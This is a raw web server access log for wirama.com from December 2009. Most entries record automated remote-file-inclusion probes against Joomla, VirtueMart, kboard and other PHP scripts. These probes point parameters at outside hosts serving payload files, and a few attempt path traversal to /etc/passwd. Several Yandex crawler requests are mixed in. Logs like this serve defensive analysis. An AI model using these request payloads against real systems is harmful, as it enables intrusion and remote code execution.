193.200.255.18 - - [01/Dec/2009:12:19:05 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:12:21:18 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:12:21:18 -0800] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:12:21:18 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:12:25:28 -0800] "GET /logs/access_090329.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:12:26:58 -0800] "GET /logs/access_090330.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:18 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:18 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:19 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:19 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:19 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:20 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:20 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:20 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:21 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:21 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:21 -0800] "GET /?D=A HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:22 -0800] "GET /?D=A HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:22 -0800] "GET /?D=A HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:22 -0800] "GET /?D=A HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:22 -0800] "GET /?M=A HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:23 -0800] "GET /?M=A HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:23 -0800] "GET /?M=A HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:23 -0800] "GET /?M=A HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
193.200.255.18 - - [01/Dec/2009:12:30:23 -0800] "GET /logs/access_090329.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:24 -0800] "GET /?N=D HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:24 -0800] "GET /?N=D HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:24 -0800] "GET /?N=D HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:25 -0800] "GET /?N=D HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:25 -0800] "GET /?S=A HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:25 -0800] "GET /?S=A HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:25 -0800] "GET /?S=A HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
77.88.51.45 - - [01/Dec/2009:12:30:26 -0800] "GET /?S=A HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
193.200.255.18 - - [01/Dec/2009:12:32:25 -0800] "GET /logs/access_090330.log%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [01/Dec/2009:12:44:39 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [01/Dec/2009:12:44:39 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [01/Dec/2009:12:44:39 -0800] "GET /logs/access_090801.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [01/Dec/2009:12:45:47 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [01/Dec/2009:12:45:47 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.131.226.52 - - [01/Dec/2009:12:45:47 -0800] "GET /logs/access_090801.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:12:46:43 -0800] "GET /logs/access_090330.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
61.66.28.36 - - [01/Dec/2009:12:49:55 -0800] "GET /logs//appserv/main.php?appserv_root=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [01/Dec/2009:12:49:55 -0800] "GET /appserv/main.php?appserv_root=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [01/Dec/2009:12:49:55 -0800] "GET /logs/access_090501.log//appserv/main.php?appserv_root=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [01/Dec/2009:12:56:03 -0800] "GET /logs/access_090901.log//appserv/main.php?appserv_root=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:12:56:39 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:12:56:39 -0800] "GET /logs/access_090401.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
157.100.230.82 - - [01/Dec/2009:12:56:39 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:12:58:30 -0800] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:12:58:30 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:12:58:31 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:12:58:38 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
157.100.230.82 - - [01/Dec/2009:12:58:38 -0800] "GET /logs/access_090731.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.onclick-online.de/luchterhand/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:12:58:38 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.139.66.104 - - [01/Dec/2009:12:58:38 -0800] "GET /logs/access_090330.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.139.66.104 - - [01/Dec/2009:12:58:39 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:12:58:39 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:12:58:39 -0800] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:12:58:57 -0800] "GET /logs/access_090401.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.66.28.36 - - [01/Dec/2009:12:59:49 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
87.139.66.104 - - [01/Dec/2009:13:00:01 -0800] "GET /logs/access_090801.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.139.66.104 - - [01/Dec/2009:13:01:27 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.139.66.104 - - [01/Dec/2009:13:01:27 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.139.66.104 - - [01/Dec/2009:13:01:27 -0800] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.139.66.104 - - [01/Dec/2009:13:01:33 -0800] "GET /logs/access_090330.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.139.66.104 - - [01/Dec/2009:13:01:33 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.139.66.104 - - [01/Dec/2009:13:01:33 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.139.66.104 - - [01/Dec/2009:13:02:22 -0800] "GET /logs/access_090801.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.139.66.104 - - [01/Dec/2009:13:02:50 -0800] "GET /logs/access_090329.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
216.7.173.20 - - [01/Dec/2009:13:04:35 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.kjf-holzminden.de/downloads/_MD.TXT??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "wirama.com"
209.92.156.53 - - [01/Dec/2009:13:15:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:15:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:15:20 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:15:42 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:15:42 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:15:42 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:16:12 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:16:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:16:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:16:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:16:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:16:31 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:16:45 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:16:56 -0800] "GET /logs/access_090801.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
94.23.50.32 - - [01/Dec/2009:13:17:22 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "wirama.com"
94.23.50.32 - - [01/Dec/2009:13:17:22 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "wirama.com"
209.92.156.53 - - [01/Dec/2009:13:17:38 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:18:34 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:18:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:18:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:18:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:18:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:18:35 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:13:18:38 -0800] "GET /logs/access_090501.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:19:03 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:19:03 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:19:03 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:20:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:20:32 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:20:32 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:20:41 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:20:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:20:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:21:06 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:21:06 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:21:09 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:21:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:21:44 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:21:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:21:44 -0800] "GET /logs/access_090801.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:21:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:13:21:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:22:04 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:13:22:04 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
